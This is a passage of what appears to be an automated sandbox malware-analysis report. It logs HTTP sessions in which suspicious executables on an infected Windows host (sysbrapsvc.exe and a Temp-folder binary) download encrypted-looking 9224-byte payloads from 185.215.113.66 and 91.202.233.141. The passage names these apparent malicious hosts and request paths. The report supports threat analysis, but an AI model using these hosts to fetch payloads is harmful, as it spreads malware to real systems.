                                                                              18 | 192.168.2.8 | 49733 | 91.202.233.141 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:23:31.698714018 CEST | 166 | OUT | GET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:32.053797960 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              19 | 192.168.2.8 | 49737 | 185.215.113.66 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:23:40.838985920 CEST | 167 | OUT | GET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:41.181057930 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:41 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:23:41.181135893 CEST | 1289 | IN | Data Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:23:41.181152105 CEST | 1289 | IN | Data Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:23:41.181360006 CEST | 1289 | IN | Data Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:23:41.181449890 CEST | 1289 | IN | Data Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:23:41.181508064 CEST | 1289 | IN | Data Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:23:41.181555033 CEST | 1289 | IN | Data Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:23:41.181571007 CEST | 465 | IN | Data Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              20 | 192.168.2.8 | 49739 | 185.215.113.66 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:23:43.559075117 CEST | 167 | OUT | GET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:43.898837090 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:43 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:23:43.898852110 CEST | 1289 | IN | Data Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:23:43.898871899 CEST | 1289 | IN | Data Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:23:43.898885012 CEST | 1289 | IN | Data Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:23:43.898936033 CEST | 1289 | IN | Data Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:23:43.898948908 CEST | 1289 | IN | Data Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:23:43.898961067 CEST | 1289 | IN | Data Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:23:43.898973942 CEST | 465 | IN | Data Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              21 | 192.168.2.8 | 49740 | 185.215.113.66 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:23:46.264875889 CEST | 167 | OUT | GET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:46.607598066 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:46 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:44 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7354-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:23:46.607613087 CEST | 1289 | IN | Data Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:23:46.607626915 CEST | 1289 | IN | Data Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:23:46.607778072 CEST | 1289 | IN | Data Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:23:46.607992887 CEST | 1289 | IN | Data Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:23:46.608006954 CEST | 1289 | IN | Data Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:23:46.608061075 CEST | 1289 | IN | Data Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:23:46.608074903 CEST | 465 | IN | Data Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              22 | 192.168.2.8 | 49742 | 91.202.233.141 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:23:50.013185024 CEST | 167 | OUT | GET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:50.368292093 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:50 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
